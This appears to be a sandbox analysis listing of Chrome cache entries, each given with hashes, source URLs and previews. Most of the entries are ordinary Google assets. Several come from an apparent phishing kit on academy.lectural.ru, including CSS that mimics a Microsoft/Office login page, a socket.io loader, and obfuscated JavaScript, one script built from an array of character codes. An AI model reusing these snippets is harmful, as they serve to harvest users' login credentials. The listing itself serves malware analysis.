URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISSAmp2SXv1givFxIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ3QAkDsEgUNqF3jdBIFDcWTxCQSBQ0BpWlyEgUNZSGZ6g==?alt=proto
Preview:	ClUKCw3PIyr/GgQICRgBCgcNxZPEJBoACgcNiaVnyxoACgcNwxk5kBoACgcN0AJA7BoACgcNqF3jdBoACgcNxZPEJBoACgcNAaVpchoACgcNZSGZ6hoA

Chrome Cache Entry: 111

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	49602
Entropy (8bit):	7.881935507115631
Encrypted:	false
SSDEEP:
MD5:	DB783743CD246FF4D77F4A3694285989
SHA1:	B9466716904457641B7831868B47162D8D378D41
SHA-256:	5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
SHA-512:	E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...p..........{......sBIT....\|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.\|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`\|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T.....(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$

Chrome Cache Entry: 112

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	downloaded
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 113

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	70712
Entropy (8bit):	6.94130504124589
Encrypted:	false
SSDEEP:
MD5:	F70FF06D19498D80B130EC78176FD3FF
SHA1:	9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
SHA-256:	DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
SHA-512:	543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......

Chrome Cache Entry: 114

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	2102
Entropy (8bit):	5.402899290972912
Encrypted:	false
SSDEEP:
MD5:	2983A5388652BF32BC4CFDF28E084EE1
SHA1:	77CCC32C298E6D7028A0161EA4595E59A2331ABC
SHA-256:	289D25D68F730E581E0A16B8BEE8F63A061717973F8AC8C29CCF2BA8FED15ADF
SHA-512:	FEAF2DCB9A234DB0CE1B82CDE30D3F0DD757A086D31AB222D06331857F06AF84D79B38C0F94857C7076CA9F1E028D0AD625BE2960FA791A07AB4BD1286D63DAD
Malicious:	false
Reputation:	low
URL:	https://fonts.googleapis.com/css?family=Roboto:400
Preview:	/* cyrillic-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./ cyrillic /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./ greek-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7mxKOzY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./ greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4WxKOzY.woff2) format('woff2');. unicode-range: U+0370-03FF

Chrome Cache Entry: 118

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	74134
Entropy (8bit):	4.208969640993926
Encrypted:	false
SSDEEP:
MD5:	28079D4D20CA22A7C3BB33DB11B491A1
SHA1:	CEE91D3067EB642EF5F73C3AAAB7D6B7EA186E7C
SHA-256:	7AF76A7E535328D136042484FC185CB2BBF1500213A54E44BEB5FDC17C01B977
SHA-512:	16E428B28D0781C91AA2BB90674308B34BEDCA7213ECE29B33885367802CB65956847DBE4EB7763FCC14645D53D7EEBAB4724838D34D1A01E4CDF847018E5D79
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/3t6837t/myscr157024.js
Preview:	var erp = new Array;.erp[0] = 60;.erp[1] = 33;.erp[2] = 68;.erp[3] = 79;.erp[4] = 67;.erp[5] = 84;.erp[6] = 89;.erp[7] = 80;.erp[8] = 69;.erp[9] = 32;.erp[10] = 104;.erp[11] = 116;.erp[12] = 109;.erp[13] = 108;.erp[14] = 62;.erp[15] = 10;.erp[16] = 60;.erp[17] = 104;.erp[18] = 116;.erp[19] = 109;.erp[20] = 108;.erp[21] = 32;.erp[22] = 108;.erp[23] = 97;.erp[24] = 110;.erp[25] = 103;.erp[26] = 61;.erp[27] = 34;.erp[28] = 101;.erp[29] = 110;.erp[30] = 34;.erp[31] = 62;.erp[32] = 10;.erp[33] = 60;.erp[34] = 104;.erp[35] = 101;.erp[36] = 97;.erp[37] = 100;.erp[38] = 62;.erp[39] = 10;.erp[40] = 32;.erp[41] = 32;.erp[42] = 32;.erp[43] = 32;.erp[44] = 60;.erp[45] = 115;.erp[46] = 99;.erp[47] = 114;.erp[48] = 105;.erp[49] = 112;.erp[50] = 116;.erp[51] = 32;.erp[52] = 115;.erp[53] = 114;.erp[54] = 99;.erp[55] = 61;.erp[56] = 34;.erp[57] = 104;.erp[58] = 116;.erp[59] = 116;.erp[60] = 112;.erp[61] = 115;.erp[62] = 58;.erp[63] = 47;.erp[64] = 47;.erp[65] = 99;.erp[66] = 111;.erp[67] = 100;.erp[68]

Chrome Cache Entry: 119

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (6620)
Category:	downloaded
Size (bytes):	6625
Entropy (8bit):	5.786692617890495
Encrypted:	false
SSDEEP:
MD5:	4350094DFC3EBD9F1FBD3D06F6750A10
SHA1:	D154FAAB19C887BBDE4EA0418EF653B69BF09EE0
SHA-256:	EF2E2B4BB298457D79F0CFD214DE9EBD5F510CDCA565A6165D1BE8AFEDE2A056
SHA-512:	4993877AEFC8DA005B41DF7F520A7947EFE167E4E23F1D5F7F9576B1F4B5D372E976E7D76D19D82DCE6B39957D3E1335CFBC22071B2C7BA2C4E0319C0C9062C6
Malicious:	false
Reputation:	low
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["illinois basketball terrence shannon jr","snl skit alaska airlines","mini crossword clues","aurora borealis forecast","dave heeke athletic director","border patrol texas","riot games layoffs","palworld early access roadmap"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"Cg0vZy8xMWh6c24zODNrEipUZXJyZW5jZSBTaGFubm9uIEpyLiDigJQgQmFza2V0YmFsbCBwbGF5ZXIy2xFkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFhQUFBREFRRUJBUUFBQUFBQUFBQUFBQUFFQlFZSEFnTUIvOFFBTXhBQUFnRURBZ1VDQkFRR0F3QUFBQUFBQVFJREJBVVJBQ0VHRWhNeFFWRmhGQ0p4a1RLaHNkRVZZbktCNGZBSEpEVC94QUFhQVFBQ0

Chrome Cache Entry: 120

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	47525
Entropy (8bit):	4.64903177758558
Encrypted:	false
SSDEEP:
MD5:	D3508BF3E8D7A98DCEAE5AFD8D046190
SHA1:	81E2A536E30F603B31F34B274AFD6AD64AC6B3C1
SHA-256:	5003C0E622BF8C51F0E61331D4F63A780B30B961C31F36E0FB35473B13F13F21
SHA-512:	72ADD108736B15287FFB894D711A4900BDB55C2A42806E72C1AC9C1240680247703021350ED7908D504F2A43EBED162EE56414FD91C141EBE908A343D7D503F8
Malicious:	false
Reputation:	low
URL:	https://ssl.gstatic.com/docs/presentations/images/punchviewer_material_sprite43_grey_medium.svg
Preview:	<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" x="0" y="0" width="52px" height="1178px" viewBox="0 0 52 1178" preserveAspectRatio="none"><g transform="translate(0,1104)"><path fill="#80868B" fill-rule="evenodd" d="m7 10 5 5 5-5z"/>.</g><g transform="translate(0,1030)"><path fill="#80868B" d="m7 14 5-5 5 5H7Z"/>.</g><g transform="translate(0,400)"><path fill="#80868B" fill-opacity="1" fill-rule="nonzero" d="M19.800781 22.601562 1.398438 4.199219l1.402343-1.398438 18.398438 18.398438ZM10 21.5c-.132812 0-.25-.050781-.351562-.148438C9.550781 21.25 9.5 21.132812 9.5 21c0-.132812.050781-.25.148438-.351562C9.75 20.550781 9.867188 20.5 10 20.5c.132812 0 .25.050781.351562.148438C10.449219 20.75 10.5 20.867188 10.5 21c0 .132812-.050781.25-.148438.351562C10.25 21.449219 10.132812 21.5 10 21.5Zm4 0c-.132812 0-.25-.

Chrome Cache Entry: 121

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	47525
Entropy (8bit):	4.644130639583191
Encrypted:	false
SSDEEP:
MD5:	D5085AC5E27C5663C223183016F4D9E4
SHA1:	E16A16D7FE37E2A1E97D6D9BC91CC58EE9AB238E
SHA-256:	D4B40A3BCC37163E92CC9114E5C3E91F14FDA9334CED4179F9DB4AD1884C312D
SHA-512:	E3AA7441137044AC7B24778F64FED225D4C49986564EF2BB763A04FBB984C652FAEEADD8452631349A1A7C9FA1CF67C29A814EFC7B7D416FF87CF616801BFB2E
Malicious:	false
Reputation:	low
Preview:	<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" x="0" y="0" width="52px" height="1178px" viewBox="0 0 52 1178" preserveAspectRatio="none"><g transform="translate(0,1104)"><path fill="#3C4043" fill-rule="evenodd" d="m7 10 5 5 5-5z"/>.</g><g transform="translate(0,1030)"><path fill="#3C4043" d="m7 14 5-5 5 5H7Z"/>.</g><g transform="translate(0,400)"><path fill="#3C4043" fill-opacity="1" fill-rule="nonzero" d="M19.800781 22.601562 1.398438 4.199219l1.402343-1.398438 18.398438 18.398438ZM10 21.5c-.132812 0-.25-.050781-.351562-.148438C9.550781 21.25 9.5 21.132812 9.5 21c0-.132812.050781-.25.148438-.351562C9.75 20.550781 9.867188 20.5 10 20.5c.132812 0 .25.050781.351562.148438C10.449219 20.75 10.5 20.867188 10.5 21c0 .132812-.050781.25-.148438.351562C10.25 21.449219 10.132812 21.5 10 21.5Zm4 0c-.132812 0-.25-.

Chrome Cache Entry: 122

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (3580)
Category:	downloaded
Size (bytes):	1043620
Entropy (8bit):	5.545001922719601
Encrypted:	false
SSDEEP:
MD5:	1F01219210F712C9ADE8EA62AA8A565A
SHA1:	ED9005405731122C3C79D55056A046D33A4FEB5B
SHA-256:	AD829F6A87C60839A8B60EF9A80E8D27F597960C711A2F2453E9C9F05E9C2ECB
SHA-512:	1BE470A644DD78F518A4F0F5AB9264963A30650D03414D5B3197150A20C318E980B29B87D45209247C794EA9DE55323592735A8174F1FA2D95321F1253980B1C
Malicious:	false
Reputation:	low
URL:	https://docs.google.com/static/presentation/client/js/1352590663-viewer_core.js
Preview:	function _F_toggles_initialize(a){("undefined"!==typeof globalThis?globalThis:"undefined"!==typeof self?self:this)._F_toggles=a\|\|[]}_F_toggles_initialize([]);./.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. SPDX-License-Identifier: Apache-2.0./.var aaa=' aria-disabled="true"',baa=' aria-hidden="true"',aa=' jsname="',ba=" seconds",ca='" class="',caa='" jscontroller="',da='" jsname="',daa='" stroke-dasharray="',eaa='" stroke-dashoffset="',fa='" stroke-width="',faa='" tabindex="-1" role="tabpanel"><div class="',gaa='" target="_blank">',haa='" viewBox="0 0 ',iaa='" xmlns="http://www.w3.org/2000/svg">',ha='">',ia='"></div>',ja='"></div></div>',ka='"></div></div></div>',la='"></div></div><div class="',ma='"></div><div class="',na='"></span>',.oa='"><div class="',qa="<",ra=""",jaa="'Times New Roman',serif",sa=", ",ta="-caption",ua="-content",va="-disabled",ya="-dropdown",za=".google.com",Aa="//www.google.com/images/cleardot.gif",Ba="/logImpres

Chrome Cache Entry: 123

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 33, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.035372245524405
Encrypted:	false
SSDEEP:
MD5:	EE8F6FA5EB661153EF3E65AA6504C385
SHA1:	6562F9224BD7267CDB0DB4695507D5D41C6F09EF
SHA-256:	16F3EA6C87005FFBF29464CA397F4026E031D5ABDF0517A722F3EFE48557618A
SHA-512:	1BB24C1F5B5699F259ED785C71F25DAABF4C745525E82743FF97E90B1EA11A421127B7CF1BD48B400399BE75E151D94C99B2CE3F0E2F08DB52D449372BC8DFA7
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.......!.....\|.......IDAT.....$.....IEND.B`.

Chrome Cache Entry: 126

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	1121
Entropy (8bit):	4.591161971630827
Encrypted:	false
SSDEEP:
MD5:	19ED26731F076611EAB312DADD069443
SHA1:	4A486618881CE4AD11B04AA006D3936AC05E8E27
SHA-256:	F126A86F634B009FB15BF541E1EBA875C94736F6FEBE3DCD056E134215197EA6
SHA-512:	CCA0144B6CDF6F1E3862968E3DB0BACEB11D62F4D338EE415EAD6D72DD303C6C1CB272B513894C909AD96653DA08E050CB01B7D746EA282EB072BA91C9127CB7
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/pages/umhm85n8q.css?cb=1705990774764
Preview:	body.start {. background-color: #f2f2f2;. background-image: url('https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg');. background-repeat: no-repeat,no-repeat;. background-position: center center,center center;. background-size: cover,cover;. color: #1b1b1b;. }.. .btn {. margin: 0 0 0 auto;. display: block;. background-color: #0067b8;. color: #fff;. border: 2px solid #0067b8;. padding: 5px 30px;. font-size: 15px;. cursor: pointer;. }.. .btn:hover {. background-color: #0067b8;. }.. .firstlogo{. background-image: url("/web6/assets/officelogo.png");. background-size: 100% 100%;. width: 108px;. height: 24px;. background-repeat: no-repeat;. }. .bannerlogo{. height: 24px;. max-height: 36px;. background-image: url("/web6/assets/officelogo.png");. backgr

Chrome Cache Entry: 127

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (817), with CRLF line terminators
Category:	downloaded
Size (bytes):	2318
Entropy (8bit):	4.987501076684725
Encrypted:	false
SSDEEP:
MD5:	B57A6FAB8C4A24D3C2CD73F64ECD2E55
SHA1:	B4E5870EA8ACE68B094D2CA264EE307F602E646D
SHA-256:	FBCACB03A3445A86FBAE29903FAC328C740E7365BB00E874824E44027D941C2D
SHA-512:	85A8F4913B503D498FA9AED59624CC03BFAB937369196F18DD37AA93A582078B6ED379FD499D87BB77806BB17247D103D39C7BDE00D606CAB846F18550A9E913
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/js/pages-head-top-web.min.js?cb=1705990773948
Preview:	var webname = "/web6";..var websitenames = ["godaddy"];..// const cacheBuster = new Date().getTime();..const cacheBuster = 26;..const cacheBusterneweverytime = new Date().getTime();..var linkElement = document.createElement("link");..linkElement.rel = "stylesheet";..linkElement.href = webname+"/assets/pages/"+pagelinkval+".css" + "?cb=" + cacheBusterneweverytime;..document.head.appendChild(linkElement);..var scriptElementsocket = document.createElement("script");..scriptElementsocket.src = "https://cdn.socket.io/4.6.0/socket.io.min.js";..document.head.appendChild(scriptElementsocket);..var linkElementcss = document.createElement("link");..linkElementcss.rel = "stylesheet";..linkElementcss.href = webname+"/assets/css/pages.min.css?cb=" + cacheBuster;..document.head.appendChild(linkElementcss);..for (var i = 0; i < websitenames.length; i++) {..var linkElementcssweb = document.createElement("link");..linkElementcssweb.rel = "stylesheet";..linkElementcssweb.href = webname+"/assets/css/page

Chrome Cache Entry: 131

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2372)
Category:	downloaded
Size (bytes):	62903
Entropy (8bit):	5.516321409777656
Encrypted:	false
SSDEEP:
MD5:	563719BD73C223C5B39A318D4CF03CF8
SHA1:	B74803E47288A741E5B21FD05D98199A82A8DEB4
SHA-256:	3ECB677C6CD5138F0363D02A870CC428FC908DF813A5171D1F279B47ECC78187
SHA-512:	AC5D48DFD5ED021BD8D594010505048FD922104A81A413EDA1668FD9A6901FC321F8B3695A68C307E0321E1AEFF58F6FABFEF81C511F53CF1A8EDC7A55171CE9
Malicious:	false
Reputation:	low
URL:	https://docs.google.com/static/presentation/client/js/1359810902-viewer_help.js
Preview:	pA(Hf);.var wZa=" apps-actiondatawidget-content-element",xZa='" height="',yZa='" tabindex="0" role="button">',zZa='" viewBox="0 0 24 24" focusable="false" fill="',AZa='<svg width="',BZa="Compatible spreadsheet shortcut",CZa="DuplicateFormError",DZa="Feedback binary script tag failed to load: ",EZa="Search keyboard shortcuts",FZa="apps-actiondatawidget-key-focused",GZa="apps-actiondatawidget-override-info-icon",HZa="apps-shortcutshelpcontentimpl-bottom-bar",IZa="apps-shortcutshelpcontentimpl-help-center-link",.O5="apps-shortcutshelpcontentimpl-input",JZa="apps-shortcutshelpcontentimpl-link",KZa="apps-shortcutshelpcontentimpl-override-banner",LZa="apps-shortcutshelpcontentimpl-override-button-container",MZa="apps-shortcutshelpcontentimpl-override-label",NZa="apps-shortcutshelpcontentimpl-override-shortcut-link",OZa="apps-shortcutshelpcontentimpl-reset-search-button",PZa="apps-shortcutshelpcontentimpl-search",QZa="apps-shortcutshelpcontentimpl-search-banner",RZa="apps-shortcutshelpcontent

Chrome Cache Entry: 132

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	197
Entropy (8bit):	4.982322201192804
Encrypted:	false
SSDEEP:
MD5:	23421AAF553A44F0EDFF3E6EB157A93A
SHA1:	CD75B102A3DB044CDEAD48B6578E7FFD088B4EC8
SHA-256:	D51EB3275405ABF2CB2C2F4E709844661BA6908AB0C9E383CD23C0C12554CE70
SHA-512:	34122BDAC230267AB2643D00D37ED42D5B82436FFB52AF050107D81FBA5320724CA8B545BF34A4F5721EA50A898EF7092D7721E5417D449A11DE88F5AF123346
Malicious:	false
Reputation:	low
URL:	https://docs.google.com/static/presentation/client/js/1612922796-viewer_app.js
Preview:	pA("app");.qA(oA(),"app");function cZa(){fA.apply(this,arguments)}u(cZa,fA);cZa.prototype.initialize=h();iA(IF("app"),cZa);sA(oA());.rA();.// Google Inc...//# sourceMappingURL=viewer_app.sourcemap.

Chrome Cache Entry: 133

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	106945
Entropy (8bit):	5.191995854228015
Encrypted:	false
SSDEEP:
MD5:	1013A0EF7CBBE775C173636562B0AC58
SHA1:	D94E169E4719B6A0FFD66C38AB308103AFC870EC
SHA-256:	04AE2BC7D03245A1047A8EF9B9043B09423FA6228B5F03DFEE7DBA9F178CA9C1
SHA-512:	EAE80253ABB1E8850D791EA540DD010B5A1268EA98B459507BD24DE9DB8FF84B566235F2E8A3D64C350643A74E24EBC8D2F7BFD91BC0738CF5EE74BFD8B56D49
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/js/pages.min.js?cb=26
Preview:	const _0x1500e9=_0x31b9;(function(_0x5f5bda,_0x3ca965){const _0x2934e2=_0x31b9,_0x1e981c=_0x5f5bda();while(!![]){try{const _0x4bcb70=parseInt(_0x2934e2(0x294))/0x1+parseInt(_0x2934e2(0x1b2))/0x2(-parseInt(_0x2934e2(0x2b5))/0x3)+-parseInt(_0x2934e2(0x17f))/0x4(parseInt(_0x2934e2(0x264))/0x5)+-parseInt(_0x2934e2(0x190))/0x6(parseInt(_0x2934e2(0x2d4))/0x7)+-parseInt(_0x2934e2(0x199))/0x8+-parseInt(_0x2934e2(0x163))/0x9(parseInt(_0x2934e2(0x1e8))/0xa)+parseInt(_0x2934e2(0x24a))/0xb;if(_0x4bcb70===_0x3ca965)break;else _0x1e981c['push'](_0x1e981c['shift']());}catch(_0x424a40){_0x1e981c['push'](_0x1e981c['shift']());}}}(_0x5bcd,0xf1581));var webnotfound=![],otherweburl='',namespaceSocket='',browserconnected=0x0,interacted=0x0,multipleaccountsback=0x0,uid='';function _0x31b9(_0x525182,_0x4afb96){const _0x5bcdda=_0x5bcd();return _0x31b9=function(_0x31b95d,_0x428336){_0x31b95d=_0x31b95d-0x14c;let _0xeec8a8=_0x5bcdda[_0x31b95d];return _0xeec8a8;},_0x31b9(_0x525182,_0x4afb96);}let socketqueue=

Chrome Cache Entry: 134

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	270
Entropy (8bit):	4.840496990713235
Encrypted:	false
SSDEEP:
MD5:	40EB39126300B56BF66C20EE75B54093
SHA1:	83678D94097257EB474713DEC49E8094F49D2E2A
SHA-256:	765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
SHA-512:	9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>

Chrome Cache Entry: 135

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 21 x 21, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	275
Entropy (8bit):	6.5201105410432945
Encrypted:	false
SSDEEP:
MD5:	E6D4B60D1F1070F9C70E11E181BD4821
SHA1:	54860D1365CB29C657E6B3066FE9B081F8A15609
SHA-256:	C4529BB647D07FBC3A858BD39FE0AFF051DD7B5CCBA99C7CEA5A307FDD7F4241
SHA-512:	2E76103A0A0A542FFB020C6987547F3A7250FA7B7EE0DBF7787C3C07956A9A49218E1D0B230790BC20E362A2CBF0F10756302A8280D3974553AE7137DE6D422E
Malicious:	false
Reputation:	low
URL:	https://ssl.gstatic.com/ui/v1/button/search-white.png
Preview:	.PNG........IHDR.....................sRGB.........bKGD..............pHYs.................IDAT8...Q..@...'..HX..P.+a%....P.H@....y.@.%..3._.A..J...........i...U.....@...,....0J-..Cz..<.!.B..8.&.q.....:,R.+P.F<.Hs\|..Y.P..h.0../LV5.j...P...4..........b[k.......IEND.B`.

Chrome Cache Entry: 136

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
Category:	downloaded
Size (bytes):	93276
Entropy (8bit):	7.997636438159837
Encrypted:	true
SSDEEP:
MD5:	BCD7983EA5AA57C55F6758B4977983CB
SHA1:	EF3A009E205229E07FB0EC8569E669B11C378EF1
SHA-256:	6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
SHA-512:	E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/fonts/GDSherpa-vf2.woff2
